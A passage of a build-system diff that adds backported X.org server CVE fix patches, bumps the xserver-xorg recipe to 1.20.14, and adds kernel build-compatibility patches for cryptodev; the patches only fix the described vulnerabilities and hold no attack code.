+index fc26a2e345..1e46d0c723 100644
+--- a/glx/glxcmds.c
++++ b/glx/glxcmds.c
+@@ -48,6 +48,7 @@
+ #include "indirect_util.h"
+ #include "protocol-versions.h"
+ #include "glxvndabi.h"
++#include "xace.h"
+ 
+ static char GLXServerVendorName[] = "SGI";
+ 
+@@ -1392,6 +1393,13 @@ DoCreatePbuffer(ClientPtr client, int screenNum, XID fbconfigId,
+     if (!pPixmap)
+         return BadAlloc;
+ 
++    err = XaceHook(XACE_RESOURCE_ACCESS, client, glxDrawableId, RT_PIXMAP,
++                   pPixmap, RT_NONE, NULL, DixCreateAccess);
++    if (err != Success) {
++        (*pGlxScreen->pScreen->DestroyPixmap) (pPixmap);
++        return err;
++    }
++
+     /* Assign the pixmap the same id as the pbuffer and add it as a
+      * resource so it and the DRI2 drawable will be reclaimed when the
+      * pbuffer is destroyed. */
+-- 
+GitLab
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0409.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0409.patch
new file mode 100644
index 0000000000..9763e0b562
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0409.patch
@@ -0,0 +1,46 @@
+From 2ef0f1116c65d5cb06d7b6d83f8a1aea702c94f7 Mon Sep 17 00:00:00 2001
+From: Olivier Fourdan <ofourdan@redhat.com>
+Date: Wed, 6 Dec 2023 11:51:56 +0100
+Subject: [PATCH] ephyr,xwayland: Use the proper private key for cursor
+
+The cursor in DIX is actually split in two parts, the cursor itself and
+the cursor bits, each with their own devPrivates.
+
+The cursor itself includes the cursor bits, meaning that the cursor bits
+devPrivates in within structure of the cursor.
+
+Both Xephyr and Xwayland were using the private key for the cursor bits
+to store the data for the cursor, and when using XSELINUX which comes
+with its own special devPrivates, the data stored in that cursor bits'
+devPrivates would interfere with the XSELINUX devPrivates data and the
+SELINUX security ID would point to some other unrelated data, causing a
+crash in the XSELINUX code when trying to (re)use the security ID.
+
+CVE-2024-0409
+
+Signed-off-by: Olivier Fourdan <ofourdan@redhat.com>
+Reviewed-by: Peter Hutterer <peter.hutterer@who-t.net>
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/2ef0f1116c65d5cb06d7b6d83f8a1aea702c94f7]
+CVE: CVE-2024-0409
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ hw/kdrive/ephyr/ephyrcursor.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/hw/kdrive/ephyr/ephyrcursor.c b/hw/kdrive/ephyr/ephyrcursor.c
+index f991899..3f192d0 100644
+--- a/hw/kdrive/ephyr/ephyrcursor.c
++++ b/hw/kdrive/ephyr/ephyrcursor.c
+@@ -246,7 +246,7 @@ miPointerSpriteFuncRec EphyrPointerSpriteFuncs = {
+ Bool
+ ephyrCursorInit(ScreenPtr screen)
+ {
+-    if (!dixRegisterPrivateKey(&ephyrCursorPrivateKey, PRIVATE_CURSOR_BITS,
++    if (!dixRegisterPrivateKey(&ephyrCursorPrivateKey, PRIVATE_CURSOR,
+                                sizeof(ephyrCursorRec)))
+         return FALSE;
+ 
+-- 
+2.25.1
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-21885.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-21885.patch
new file mode 100644
index 0000000000..7c8fbcc3ec
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-21885.patch
@@ -0,0 +1,113 @@
+From 4a5e9b1895627d40d26045bd0b7ef3dce503cbd1 Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Thu, 4 Jan 2024 10:01:24 +1000
+Subject: [PATCH] Xi: flush hierarchy events after adding/removing master
+ devices
+
+The `XISendDeviceHierarchyEvent()` function allocates space to store up
+to `MAXDEVICES` (256) `xXIHierarchyInfo` structures in `info`.
+
+If a device with a given ID was removed and a new device with the same
+ID added both in the same operation, the single device ID will lead to
+two info structures being written to `info`.
+
+Since this case can occur for every device ID at once, a total of two
+times `MAXDEVICES` info structures might be written to the allocation.
+
+To avoid it, once one add/remove master is processed, send out the
+device hierarchy event for the current state and continue. That event
+thus only ever has exactly one of either added/removed in it (and
+optionally slave attached/detached).
+
+CVE-2024-21885, ZDI-CAN-22744
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/4a5e9b1895627d40d26045bd0b7ef3dce503cbd1]
+CVE: CVE-2024-21885
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ Xi/xichangehierarchy.c | 27 ++++++++++++++++++++++-----
+ 1 file changed, 22 insertions(+), 5 deletions(-)
+
+diff --git a/Xi/xichangehierarchy.c b/Xi/xichangehierarchy.c
+index d2d985848d..72d00451e3 100644
+--- a/Xi/xichangehierarchy.c
++++ b/Xi/xichangehierarchy.c
+@@ -416,6 +416,11 @@ ProcXIChangeHierarchy(ClientPtr client)
+     size_t len;			/* length of data remaining in request */
+     int rc = Success;
+     int flags[MAXDEVICES] = { 0 };
++    enum {
++        NO_CHANGE,
++        FLUSH,
++        CHANGED,
++    } changes = NO_CHANGE;
+ 
+     REQUEST(xXIChangeHierarchyReq);
+     REQUEST_AT_LEAST_SIZE(xXIChangeHierarchyReq);
+@@ -465,8 +470,9 @@ ProcXIChangeHierarchy(ClientPtr client)
+             rc = add_master(client, c, flags);
+             if (rc != Success)
+                 goto unwind;
+-        }
++            changes = FLUSH;
+             break;
++        }
+         case XIRemoveMaster:
+         {
+             xXIRemoveMasterInfo *r = (xXIRemoveMasterInfo *) any;
+@@ -475,8 +481,9 @@ ProcXIChangeHierarchy(ClientPtr client)
+             rc = remove_master(client, r, flags);
+             if (rc != Success)
+                 goto unwind;
+-        }
++            changes = FLUSH;
+             break;
++        }
+         case XIDetachSlave:
+         {
+             xXIDetachSlaveInfo *c = (xXIDetachSlaveInfo *) any;
+@@ -485,8 +492,9 @@ ProcXIChangeHierarchy(ClientPtr client)
+             rc = detach_slave(client, c, flags);
+             if (rc != Success)
+                 goto unwind;
+-        }
++            changes = CHANGED;
+             break;
++        }
+         case XIAttachSlave:
+         {
+             xXIAttachSlaveInfo *c = (xXIAttachSlaveInfo *) any;
+@@ -495,16 +503,25 @@ ProcXIChangeHierarchy(ClientPtr client)
+             rc = attach_slave(client, c, flags);
+             if (rc != Success)
+                 goto unwind;
++            changes = CHANGED;
++            break;
+         }
++        default:
+             break;
+         }
+ 
++        if (changes == FLUSH) {
++            XISendDeviceHierarchyEvent(flags);
++            memset(flags, 0, sizeof(flags));
++            changes = NO_CHANGE;
++        }
++
+         len -= any->length * 4;
+         any = (xXIAnyHierarchyChangeInfo *) ((char *) any + any->length * 4);
+     }
+ 
+  unwind:
+-
+-    XISendDeviceHierarchyEvent(flags);
++    if (changes != NO_CHANGE)
++        XISendDeviceHierarchyEvent(flags);
+     return rc;
+ }
+-- 
+GitLab
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-21886-1.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-21886-1.patch
new file mode 100644
index 0000000000..1e1c782963
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-21886-1.patch
@@ -0,0 +1,74 @@
+From bc1fdbe46559dd947674375946bbef54dd0ce36b Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Jos=C3=A9=20Exp=C3=B3sito?= <jexposit@redhat.com>
+Date: Fri, 22 Dec 2023 18:28:31 +0100
+Subject: [PATCH] Xi: do not keep linked list pointer during recursion
+
+The `DisableDevice()` function is called whenever an enabled device
+is disabled and it moves the device from the `inputInfo.devices` linked
+list to the `inputInfo.off_devices` linked list.
+
+However, its link/unlink operation has an issue during the recursive
+call to `DisableDevice()` due to the `prev` pointer pointing to a
+removed device.
+
+This issue leads to a length mismatch between the total number of
+devices and the number of device in the list, leading to a heap
+overflow and, possibly, to local privilege escalation.
+
+Simplify the code that checked whether the device passed to
+`DisableDevice()` was in `inputInfo.devices` or not and find the
+previous device after the recursion.
+
+CVE-2024-21886, ZDI-CAN-22840
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/bc1fdbe46559dd947674375946bbef54dd0ce36b]
+CVE: CVE-2024-21886
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ dix/devices.c | 15 ++++++++++++---
+ 1 file changed, 12 insertions(+), 3 deletions(-)
+
+diff --git a/dix/devices.c b/dix/devices.c
+index dca98c8d1b..389d28a23c 100644
+--- a/dix/devices.c
++++ b/dix/devices.c
+@@ -453,14 +453,20 @@ DisableDevice(DeviceIntPtr dev, BOOL sendevent)
+ {
+     DeviceIntPtr *prev, other;
+     BOOL enabled;
++    BOOL dev_in_devices_list = FALSE;
+     int flags[MAXDEVICES] = { 0 };
+ 
+     if (!dev->enabled)
+         return TRUE;
+ 
+-    for (prev = &inputInfo.devices;
+-         *prev && (*prev != dev); prev = &(*prev)->next);
+-    if (*prev != dev)
++    for (other = inputInfo.devices; other; other = other->next) {
++        if (other == dev) {
++            dev_in_devices_list = TRUE;
++            break;
++        }
++    }
++
++    if (!dev_in_devices_list)
+         return FALSE;
+ 
+     TouchEndPhysicallyActiveTouches(dev);
+@@ -511,6 +517,9 @@ DisableDevice(DeviceIntPtr dev, BOOL sendevent)
+     LeaveWindow(dev);
+     SetFocusOut(dev);
+ 
++    for (prev = &inputInfo.devices;
++         *prev && (*prev != dev); prev = &(*prev)->next);
++
+     *prev = dev->next;
+     dev->next = inputInfo.off_devices;
+     inputInfo.off_devices = dev;
+-- 
+GitLab
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-21886-2.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-21886-2.patch
new file mode 100644
index 0000000000..af607df4f0
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-21886-2.patch
@@ -0,0 +1,57 @@
+From 26769aa71fcbe0a8403b7fb13b7c9010cc07c3a8 Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Fri, 5 Jan 2024 09:40:27 +1000
+Subject: [PATCH] dix: when disabling a master, float disabled slaved devices
+ too
+
+Disabling a master device floats all slave devices but we didn't do this
+to already-disabled slave devices. As a result those devices kept their
+reference to the master device resulting in access to already freed
+memory if the master device was removed before the corresponding slave
+device.
+
+And to match this behavior, also forcibly reset that pointer during
+CloseDownDevices().
+
+Related to CVE-2024-21886, ZDI-CAN-22840
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/26769aa71fcbe0a8403b7fb13b7c9010cc07c3a8]
+CVE: CVE-2024-21886
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ dix/devices.c | 12 ++++++++++++
+ 1 file changed, 12 insertions(+)
+
+diff --git a/dix/devices.c b/dix/devices.c
+index 389d28a23c..84a6406d13 100644
+--- a/dix/devices.c
++++ b/dix/devices.c
+@@ -483,6 +483,13 @@ DisableDevice(DeviceIntPtr dev, BOOL sendevent)
+                 flags[other->id] |= XISlaveDetached;
+             }
+         }
++
++        for (other = inputInfo.off_devices; other; other = other->next) {
++            if (!IsMaster(other) && GetMaster(other, MASTER_ATTACHED) == dev) {
++                AttachDevice(NULL, other, NULL);
++                flags[other->id] |= XISlaveDetached;
++            }
++        }
+     }
+     else {
+         for (other = inputInfo.devices; other; other = other->next) {
+@@ -1088,6 +1095,11 @@ CloseDownDevices(void)
+             dev->master = NULL;
+     }
+ 
++    for (dev = inputInfo.off_devices; dev; dev = dev->next) {
++        if (!IsMaster(dev) && !IsFloating(dev))
++            dev->master = NULL;
++    }
++
+     CloseDeviceList(&inputInfo.devices);
+     CloseDeviceList(&inputInfo.off_devices);
+ 
+-- 
+GitLab
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-31080.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-31080.patch
new file mode 100644
index 0000000000..da735efb2b
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-31080.patch
@@ -0,0 +1,49 @@
+From 96798fc1967491c80a4d0c8d9e0a80586cb2152b Mon Sep 17 00:00:00 2001
+From: Alan Coopersmith <alan.coopersmith@oracle.com>
+Date: Fri, 22 Mar 2024 18:51:45 -0700
+Subject: [PATCH] Xi: ProcXIGetSelectedEvents needs to use unswapped length to
+ send reply
+
+CVE-2024-31080
+
+Reported-by: https://debbugs.gnu.org/cgi/bugreport.cgi?bug=69762
+Fixes: 53e821ab4 ("Xi: add request processing for XIGetSelectedEvents.")
+Signed-off-by: Alan Coopersmith <alan.coopersmith@oracle.com>
+Part-of: <https://gitlab.freedesktop.org/xorg/xserver/-/merge_requests/1463>
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/96798fc1967491c80a4d0c8d9e0a80586cb2152b]
+CVE: CVE-2024-31080
+Signed-off-by: Ashish Sharma <asharma@mvista.com>
+
+ Xi/xiselectev.c | 5 ++++-
+ 1 file changed, 4 insertions(+), 1 deletion(-)
+
+diff --git a/Xi/xiselectev.c b/Xi/xiselectev.c
+index edcb8a0d36..ac14949871 100644
+--- a/Xi/xiselectev.c
++++ b/Xi/xiselectev.c
+@@ -349,6 +349,7 @@ ProcXIGetSelectedEvents(ClientPtr client)
+     InputClientsPtr others = NULL;
+     xXIEventMask *evmask = NULL;
+     DeviceIntPtr dev;
++    uint32_t length;
+ 
+     REQUEST(xXIGetSelectedEventsReq);
+     REQUEST_SIZE_MATCH(xXIGetSelectedEventsReq);
+@@ -418,10 +419,12 @@ ProcXIGetSelectedEvents(ClientPtr client)
+         }
+     }
+ 
++    /* save the value before SRepXIGetSelectedEvents swaps it */
++    length = reply.length;
+     WriteReplyToClient(client, sizeof(xXIGetSelectedEventsReply), &reply);
+ 
+     if (reply.num_masks)
+-        WriteToClient(client, reply.length * 4, buffer);
++        WriteToClient(client, length * 4, buffer);
+ 
+     free(buffer);
+     return Success;
+-- 
+GitLab
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-31081.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-31081.patch
new file mode 100644
index 0000000000..d2c551a0e5
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-31081.patch
@@ -0,0 +1,47 @@
+From 3e77295f888c67fc7645db5d0c00926a29ffecee Mon Sep 17 00:00:00 2001
+From: Alan Coopersmith <alan.coopersmith@oracle.com>
+Date: Fri, 22 Mar 2024 18:56:27 -0700
+Subject: [PATCH] Xi: ProcXIPassiveGrabDevice needs to use unswapped length to
+ send reply
+
+CVE-2024-31081
+
+Fixes: d220d6907 ("Xi: add GrabButton and GrabKeysym code.")
+Signed-off-by: Alan Coopersmith <alan.coopersmith@oracle.com>
+Part-of: <https://gitlab.freedesktop.org/xorg/xserver/-/merge_requests/1463>
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/3e77295f888c67fc7645db5d0c00926a29ffecee]
+CVE: CVE-2024-31081
+Signed-off-by: Ashish Sharma <asharma@mvista.com>
+
+ Xi/xipassivegrab.c | 5 ++++-
+ 1 file changed, 4 insertions(+), 1 deletion(-)
+
+diff --git a/Xi/xipassivegrab.c b/Xi/xipassivegrab.c
+index c9ac2f8553..896233bec2 100644
+--- a/Xi/xipassivegrab.c
++++ b/Xi/xipassivegrab.c
+@@ -93,6 +93,7 @@ ProcXIPassiveGrabDevice(ClientPtr client)
+     GrabParameters param;
+     void *tmp;
+     int mask_len;
++    uint32_t length;
+ 
+     REQUEST(xXIPassiveGrabDeviceReq);
+     REQUEST_FIXED_SIZE(xXIPassiveGrabDeviceReq,
+@@ -247,9 +248,11 @@ ProcXIPassiveGrabDevice(ClientPtr client)
+         }
+     }
+ 
++    /* save the value before SRepXIPassiveGrabDevice swaps it */
++    length = rep.length;
+     WriteReplyToClient(client, sizeof(rep), &rep);
+     if (rep.num_modifiers)
+-        WriteToClient(client, rep.length * 4, modifiers_failed);
++        WriteToClient(client, length * 4, modifiers_failed);
+ 
+  out:
+     free(modifiers_failed);
+-- 
+GitLab
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg_1.20.14.bb b/meta/recipes-graphics/xorg-xserver/xserver-xorg_1.20.14.bb
new file mode 100644
index 0000000000..04a6e734ef
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg_1.20.14.bb
@@ -0,0 +1,61 @@
+require xserver-xorg.inc
+
+SRC_URI += "file://0001-xf86pciBus.c-use-Intel-ddx-only-for-pre-gen4-hardwar.patch \
+           file://pkgconfig.patch \
+           file://0001-test-xtest-Initialize-array-with-braces.patch \
+           file://sdksyms-no-build-path.patch \
+           file://0001-drmmode_display.c-add-missing-mi.h-include.patch \
+           file://CVE-2022-3550.patch \
+           file://CVE-2022-3551.patch \
+           file://CVE-2022-3553.patch \
+           file://CVE-2022-4283.patch \
+           file://CVE-2022-46340.patch \
+           file://CVE-2022-46341.patch \
+           file://CVE-2022-46342.patch \
+           file://CVE-2022-46343.patch \
+           file://CVE-2022-46344.patch \
+           file://CVE-2023-0494.patch \
+           file://CVE-2023-1393.patch \
+           file://CVE-2023-5367.patch \
+           file://CVE-2023-5380.patch \
+           file://CVE-2023-6377.patch \
+           file://CVE-2023-6478.patch \
+           file://CVE-2023-6816.patch \
+           file://CVE-2024-0229-1.patch \
+           file://CVE-2024-0229-2.patch \
+           file://CVE-2024-0229-3.patch \
+           file://CVE-2024-0229-4.patch \
+           file://CVE-2024-21885.patch \
+           file://CVE-2024-21886-1.patch \
+           file://CVE-2024-21886-2.patch \
+           file://CVE-2024-0408.patch \
+           file://CVE-2024-0409.patch \
+           file://CVE-2024-31081.patch \
+           file://CVE-2024-31080.patch \
+"
+SRC_URI[md5sum] = "453fc86aac8c629b3a5b77e8dcca30bf"
+SRC_URI[sha256sum] = "54b199c9280ff8bf0f73a54a759645bd0eeeda7255d1c99310d5b7595f3ac066"
+
+CFLAGS += "-fcommon"
+
+# These extensions are now integrated into the server, so declare the migration
+# path for in-place upgrades.
+
+RREPLACES_${PN} =  "${PN}-extension-dri \
+                    ${PN}-extension-dri2 \
+                    ${PN}-extension-record \
+                    ${PN}-extension-extmod \
+                    ${PN}-extension-dbe \
+                   "
+RPROVIDES_${PN} =  "${PN}-extension-dri \
+                    ${PN}-extension-dri2 \
+                    ${PN}-extension-record \
+                    ${PN}-extension-extmod \
+                    ${PN}-extension-dbe \
+                   "
+RCONFLICTS_${PN} = "${PN}-extension-dri \
+                    ${PN}-extension-dri2 \
+                    ${PN}-extension-record \
+                    ${PN}-extension-extmod \
+                    ${PN}-extension-dbe \
+                   "
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg_1.20.8.bb b/meta/recipes-graphics/xorg-xserver/xserver-xorg_1.20.8.bb
deleted file mode 100644
index 51d959f86c..0000000000
--- a/meta/recipes-graphics/xorg-xserver/xserver-xorg_1.20.8.bb
+++ /dev/null
@@ -1,38 +0,0 @@
-require xserver-xorg.inc
-
-SRC_URI += "file://0001-xf86pciBus.c-use-Intel-ddx-only-for-pre-gen4-hardwar.patch \
-           file://pkgconfig.patch \
-           file://0001-test-xtest-Initialize-array-with-braces.patch \
-           file://sdksyms-no-build-path.patch \
-           file://0001-drmmode_display.c-add-missing-mi.h-include.patch \
-           file://CVE-2020-14347.patch \
-           file://CVE-2020-14346.patch \
-           file://CVE-2020-14361.patch \
-           file://CVE-2020-14362.patch \
-           "
-SRC_URI[md5sum] = "a770aec600116444a953ff632f51f839"
-SRC_URI[sha256sum] = "d17b646bee4ba0fb7850c1cc55b18e3e8513ed5c02bdf38da7e107f84e2d0146"
-
-CFLAGS += "-fcommon"
-
-# These extensions are now integrated into the server, so declare the migration
-# path for in-place upgrades.
-
-RREPLACES_${PN} =  "${PN}-extension-dri \
-                    ${PN}-extension-dri2 \
-                    ${PN}-extension-record \
-                    ${PN}-extension-extmod \
-                    ${PN}-extension-dbe \
-                   "
-RPROVIDES_${PN} =  "${PN}-extension-dri \
-                    ${PN}-extension-dri2 \
-                    ${PN}-extension-record \
-                    ${PN}-extension-extmod \
-                    ${PN}-extension-dbe \
-                   "
-RCONFLICTS_${PN} = "${PN}-extension-dri \
-                    ${PN}-extension-dri2 \
-                    ${PN}-extension-record \
-                    ${PN}-extension-extmod \
-                    ${PN}-extension-dbe \
-                   "
diff --git a/meta/recipes-kernel/blktrace/blktrace_git.bb b/meta/recipes-kernel/blktrace/blktrace_git.bb
index 6903053b5b..2110bc75fa 100644
--- a/meta/recipes-kernel/blktrace/blktrace_git.bb
+++ b/meta/recipes-kernel/blktrace/blktrace_git.bb
@@ -1,4 +1,9 @@
 SUMMARY = "Generates traces of I/O traffic on block devices"
+DESCRIPTION = "blktrace is a block layer IO tracing mechanism which provides \
+detailed information about request queue operations up to user space. There \
+are three major components: a kernel component, a utility to record the i/o \
+trace information for the kernel to user space, and utilities to analyse and \
+view the trace information."
 HOMEPAGE = "http://brick.kernel.dk/snaps/"
 LICENSE = "GPLv2"
 LIC_FILES_CHKSUM = "file://COPYING;md5=393a5ca445f6965873eca0259a17f833"
@@ -9,7 +14,7 @@ SRCREV = "cca113f2fe0759b91fd6a0e10fdcda2c28f18a7e"
 
 PV = "1.2.0+git${SRCPV}"
 
-SRC_URI = "git://git.kernel.dk/blktrace.git \
+SRC_URI = "git://git.kernel.dk/blktrace.git;branch=master \
            file://ldflags.patch \
            file://CVE-2018-10689.patch \
            file://make-btt-scripts-python3-ready.patch \
diff --git a/meta/recipes-kernel/cryptodev/cryptodev-module_1.10.bb b/meta/recipes-kernel/cryptodev/cryptodev-module_1.10.bb
index 552eb6abaa..d7c7918515 100644
--- a/meta/recipes-kernel/cryptodev/cryptodev-module_1.10.bb
+++ b/meta/recipes-kernel/cryptodev/cryptodev-module_1.10.bb
@@ -9,6 +9,9 @@ DEPENDS += "cryptodev-linux"
 
 SRC_URI += " \
 file://0001-Disable-installing-header-file-provided-by-another-p.patch \
+file://0001-Fix-build-for-Linux-5.8-rc1.patch \
+file://0001-Fix-build-for-Linux-5.9-rc1.patch \
+file://fix-build-for-Linux-5.11-rc1.patch \
 "
 
 EXTRA_OEMAKE='KERNEL_DIR="${STAGING_KERNEL_DIR}" PREFIX="${D}"'
diff --git a/meta/recipes-kernel/cryptodev/cryptodev.inc b/meta/recipes-kernel/cryptodev/cryptodev.inc
index f99f8bc9f0..f02619cabe 100644
--- a/meta/recipes-kernel/cryptodev/cryptodev.inc
+++ b/meta/recipes-kernel/cryptodev/cryptodev.inc
@@ -1,9 +1,14 @@
 HOMEPAGE = "http://cryptodev-linux.org/"
+DESCRIPTION = "Cryptodev-linux is a device that allows access to Linux kernel \
+cryptographic drivers; thus allowing of userspace applications to take advantage \
+of hardware accelerators. Cryptodev-linux is implemented as a standalone \
+module that requires no dependencies other than a stock linux kernel. Its \
+API is compatible with OpenBSD's cryptodev userspace API (/dev/crypto)."
 
 LICENSE = "GPLv2"
 LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263"
 
-SRC_URI = "git://github.com/cryptodev-linux/cryptodev-linux \
+SRC_URI = "git://github.com/cryptodev-linux/cryptodev-linux;branch=master;protocol=https \
            "
 SRCREV = "a87053bee5680878c295b7d23cf0d7065576ac2b"
 
diff --git a/meta/recipes-kernel/cryptodev/files/0001-Fix-build-for-Linux-5.8-rc1.patch b/meta/recipes-kernel/cryptodev/files/0001-Fix-build-for-Linux-5.8-rc1.patch
new file mode 100644
index 0000000000..02c721a4f3
--- /dev/null
+++ b/meta/recipes-kernel/cryptodev/files/0001-Fix-build-for-Linux-5.8-rc1.patch
@@ -0,0 +1,49 @@
+From 9e765068582aae3696520346a7500322ca6cc2de Mon Sep 17 00:00:00 2001
+From: Joan Bruguera <joanbrugueram@gmail.com>
+Date: Sat, 13 Jun 2020 19:46:44 +0200
+Subject: [PATCH] Fix build for Linux 5.8-rc1
+
+See also: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=9740ca4e95b43b91a4a848694a20d01ba6818f7b
+          https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=da1c55f1b272f4bd54671d459b39ea7b54944ef9
+          https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=d8ed45c5dcd455fc5848d47f86883a1b872ac0d0
+
+Signed-off-by: Joan Bruguera <joanbrugueram@gmail.com>
+
+Upstream-Status: Backport [9e765068582aae3696520346a7500322ca6cc2de]
+
+Signed-off-by: He Zhe <zhe.he@windriver.com>
+---
+ zc.c | 8 ++++++++
+ 1 file changed, 8 insertions(+)
+
+diff --git a/zc.c b/zc.c
+index ae464ff..2c286bb 100644
+--- a/zc.c
++++ b/zc.c
+@@ -58,7 +58,11 @@ int __get_userbuf(uint8_t __user *addr, uint32_t len, int write,
+ 		return 0;
+ 	}
+ 
++#if (LINUX_VERSION_CODE < KERNEL_VERSION(5, 8, 0))
+ 	down_read(&mm->mmap_sem);
++#else
++	mmap_read_lock(mm);
++#endif
+ #if (LINUX_VERSION_CODE < KERNEL_VERSION(4, 6, 0))
+ 	ret = get_user_pages(task, mm,
+ 			(unsigned long)addr, pgcount, write, 0, pg, NULL);
+@@ -74,7 +78,11 @@ int __get_userbuf(uint8_t __user *addr, uint32_t len, int write,
+ 			(unsigned long)addr, pgcount, write ? FOLL_WRITE : 0,
+ 			pg, NULL, NULL);
+ #endif
++#if (LINUX_VERSION_CODE < KERNEL_VERSION(5, 8, 0))
+ 	up_read(&mm->mmap_sem);
++#else
++	mmap_read_unlock(mm);
++#endif
+ 	if (ret != pgcount)
+ 		return -EINVAL;
+ 
+-- 
+2.17.1
+
diff --git a/meta/recipes-kernel/cryptodev/files/0001-Fix-build-for-Linux-5.9-rc1.patch b/meta/recipes-kernel/cryptodev/files/0001-Fix-build-for-Linux-5.9-rc1.patch
new file mode 100644
index 0000000000..cf1c04df9e
--- /dev/null
+++ b/meta/recipes-kernel/cryptodev/files/0001-Fix-build-for-Linux-5.9-rc1.patch
@@ -0,0 +1,42 @@
+From 2f5e08aebf9229599aae7f25db752f74221cd71d Mon Sep 17 00:00:00 2001
+From: Joan Bruguera <joanbrugueram@gmail.com>
+Date: Fri, 14 Aug 2020 00:13:38 +0200
+Subject: [PATCH] Fix build for Linux 5.9-rc1
+
+See also: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=64019a2e467a288a16b65ab55ddcbf58c1b00187
+          https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=bce617edecada007aee8610fbe2c14d10b8de2f6
+          https://lore.kernel.org/lkml/CAHk-=wj_V2Tps2QrMn20_W0OJF9xqNh52XSGA42s-ZJ8Y+GyKw@mail.gmail.com/
+
+Signed-off-by: Joan Bruguera <joanbrugueram@gmail.com>
+
+Upstream-Status: Backport [https://github.com/cryptodev-linux/cryptodev-linux/commit/2f5e08aebf9229599aae7f25db752f74221cd71d]
+
+Signed-off-by: Naveen Saini <naveen.kumar.saini@intel.com>
+
+---
+ zc.c | 6 +++++-
+ 1 file changed, 5 insertions(+), 1 deletion(-)
+
+diff --git a/zc.c b/zc.c
+index a560db5..fdf7da1 100644
+--- a/zc.c
++++ b/zc.c
+@@ -76,10 +76,14 @@ int __get_userbuf(uint8_t __user *addr, uint32_t len, int write,
+ 	ret = get_user_pages_remote(task, mm,
+ 			(unsigned long)addr, pgcount, write ? FOLL_WRITE : 0,
+ 			pg, NULL);
+-#else
++#elif (LINUX_VERSION_CODE < KERNEL_VERSION(5, 9, 0))
+ 	ret = get_user_pages_remote(task, mm,
+ 			(unsigned long)addr, pgcount, write ? FOLL_WRITE : 0,
+ 			pg, NULL, NULL);
++#else
++	ret = get_user_pages_remote(mm,
++			(unsigned long)addr, pgcount, write ? FOLL_WRITE : 0,
++			pg, NULL, NULL);
+ #endif
+ #if (LINUX_VERSION_CODE < KERNEL_VERSION(5, 8, 0))
+ 	up_read(&mm->mmap_sem);
+-- 
+2.17.1
+
diff --git a/meta/recipes-kernel/cryptodev/files/fix-build-for-Linux-5.11-rc1.patch b/meta/recipes-kernel/cryptodev/files/fix-build-for-Linux-5.11-rc1.patch
new file mode 100644
index 0000000000..3ae77cb9d6
--- /dev/null
+++ b/meta/recipes-kernel/cryptodev/files/fix-build-for-Linux-5.11-rc1.patch
@@ -0,0 +1,32 @@
+From 55c6315058fc0dd189ffd116f2cc27ba4fa84cb6 Mon Sep 17 00:00:00 2001
+From: Joan Bruguera <joanbrugueram@gmail.com>
+Date: Mon, 28 Dec 2020 01:41:31 +0100
+Subject: [PATCH] Fix build for Linux 5.11-rc1
+
+ksys_close was removed, as far as I can tell, close_fd replaces it.
+
+See also: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=8760c909f54a82aaa6e76da19afe798a0c77c3c3
+          https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=1572bfdf21d4d50e51941498ffe0b56c2289f783
+
+Upstream-Status: Backport [https://github.com/cryptodev-linux/cryptodev-linux/commit/55c6315058fc0dd189ffd116f2cc27ba4fa84cb6]
